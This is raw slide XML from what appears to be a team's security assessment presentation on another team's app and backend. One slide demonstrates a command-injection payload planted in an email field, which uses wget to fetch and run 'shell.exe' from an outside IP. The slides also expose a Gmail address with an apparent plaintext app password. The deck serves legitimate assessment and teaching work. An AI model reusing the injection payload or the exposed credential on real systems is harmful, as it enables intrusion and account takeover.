              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4" tooltip="http://20.119.70.194:81/b"/>
              </a:rPr>
              <a:t>http://20.119.70.194:81/b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t> -O s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>;#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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>powershell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command would be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>generated as follows with the email address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New user account is registered to trigger executing the bind shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>     - Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t>t@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>t.co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t>' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>F";mv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t> s shell.exe; .\shell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>;#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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> command would be generated as follows with the email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>address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Demonstration video will be played in next slide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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782595" y="2110214"/>
            <a:ext cx="1042910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powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Bypass -Command "Send-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MailMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -To 't@t.co' -F";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> http://20.119.70.194:81/b -O s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;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#' -From ' lgss23.team2@gmail.com' -Subject 'Two-factor authentication' -Body 'Token :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RMHYACSc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' -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SmtpServer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'smtp.gmail.com' -Port 587 -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UseSsl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-Credential (New-Object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System.Management.Automation.PSCredential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-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ArgumentList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' lgss23.team2@gmail.com', (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ConvertTo-SecureString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-String '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bbmugvpajgoanzbu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' -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AsPlainText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-Force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>))"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="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782595" y="4664056"/>
            <a:ext cx="10429102" cy="95410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powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Bypass -Command "Send-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MailMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -To 't@t.co' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F";mv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> s shell.exe; .\shell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>;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#' -From ' lgss23.team2@gmail.com' -Subject 'Two-factor authentication' -Body 'Token : SdT3e2C5' -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SmtpServer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'smtp.gmail.com' -Port 587 -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UseSsl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-Credential (New-Object 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System.Management.Automation.PSCredential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-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ArgumentList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' lgss23.team2@gmail.com', (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ConvertTo-SecureString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-String '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bbmugvpajgoanzbu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' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>AsPlainText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -Force))"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24688367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632229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Major vulnerability (V15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) - demonstration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="pen_Demo_final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262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Major vulnerability (V15)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26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99743" y="1013281"/>
            <a:ext cx="10868332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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impact</a:t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 smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>the event of a Command Injection attack, where malicious commands are injected and executed on the system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>The attacker can leverage the acquired privileges to access sensitive information, manipulate the system, or perform further </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Recommendation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Treat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>user inputs as untrusted data and perform input validation to restrict the allowed characters or format in input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>fields</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>safe methods to parameterize the command execution.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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3280" y="3844176"/>
            <a:ext cx="4469130" cy="26188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9623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262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Reflection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9415" y="1086703"/>
            <a:ext cx="83135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Fuzz test</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Initially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>our team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>planned to conduct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>fuzz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>test with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>WinAFL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- After </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>some preliminary research, we found that setting up the fuzz test for this project requires a lot of time and effort. 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Given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>the limited time available for this project, we decided not to perform this activity, instead focusing on the remaining testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>techniques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- We will learn the technique for fuzz test later so that we can utilize this test method in other project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Generating official report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- Our mission for phase2 was not only finding vulnerabilities but also creating security assessment report including recommendations to remove the vulnerabilities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- Due to lack of the time, our team couldn’t put much effort on generating assessment report</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- We’ll try to allocate enough time to create official assessment report in future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27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63050" y="3337493"/>
            <a:ext cx="2266950" cy="318135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63050" y="1086703"/>
            <a:ext cx="2405062" cy="1950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70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262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Lessons Learned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340" y="1161970"/>
            <a:ext cx="745631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/>
              <a:t>Incident response is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>crucial in maintaining secure system</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>- No system can be completely free of vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Incident </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>is mandatory process especially for cyber security</a:t>
            </a:r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Study </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>and utilize appropriate tools and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>techniques for security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Stay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>updated on suitable tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>for security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>practices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Automation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>DevOps will improve code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>quality </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>continuously without big effort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The more we perform threat analysis, the more we can make our system secure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 smtClean="0"/>
              <a:t>- Threat analysis and mitigation will prevent the attacker find vulnerable point of the system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28</a:t>
            </a:fld>
            <a:endParaRPr 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25925" y="2904418"/>
            <a:ext cx="2842135" cy="165634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05800" y="947926"/>
            <a:ext cx="2862261" cy="17844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5925" y="4732788"/>
            <a:ext cx="2901406" cy="15537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2806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418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Q&amp;A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89" y="1033497"/>
            <a:ext cx="5381352" cy="4883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1116" y="6056400"/>
            <a:ext cx="94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/>
              <a:t>Email Contact for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0"/>
              <a:t>Additional Questions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>and Incident Response : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ss-team4@lge.com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1056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78672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Security evaluation plan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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;91;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78501" y="826128"/>
            <a:ext cx="9806677" cy="247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Exchange projects with other team (team4 &lt;-&gt; team2)</a:t>
            </a:r>
          </a:p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Review artifacts from team2 and analyze vulnerable points from the design</a:t>
            </a:r>
          </a:p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Establish goals of the evaluation and select available security evaluation techniques</a:t>
            </a:r>
          </a:p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Conduct security evaluation using selected techniques</a:t>
            </a:r>
          </a:p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Analyze and assess found vulnerabilities</a:t>
            </a:r>
          </a:p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Generate security assessment report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 1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113" y="3197030"/>
            <a:ext cx="11677836" cy="3524250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78501" y="5090984"/>
            <a:ext cx="11737448" cy="12274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53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659661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Review result from given artifacts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1" y="1045029"/>
            <a:ext cx="8603763" cy="56005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8682264" y="1045029"/>
            <a:ext cx="315397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Given requirements on phase1 is same to all teams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By analyzing the design and  run time behavior, system design and entities were similar to ours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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decided to reuse threat analysis result from ours to evaluate the given system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375946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659661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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goal &amp; Strategy for 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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E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valuation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388618" y="993134"/>
            <a:ext cx="1040130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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To conduct security evaluation, our team focused on followings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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evaluating security requirements which was derived from threat analysis in phase1 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PKI-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server authentication for App and Backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server =&gt; Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis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Secure communication between Apps =&gt; Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis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Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>communication between App and Backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server =&gt; Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis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Two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>factor authentication using password and OTP to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email =&gt; Design </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Review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Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validation check by Backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server =&gt; Penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Breaking C.I.A property on valuable asset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Confidentiality and integrity of User information =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eview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en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ngineering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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Confidentiality </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of encryption key =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ngineering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Availability of backend server =&gt; Design </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Finding vulnerable point by using automated tools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static analysis =&gt; Visual studio code analysis,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CppCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,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SonarCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
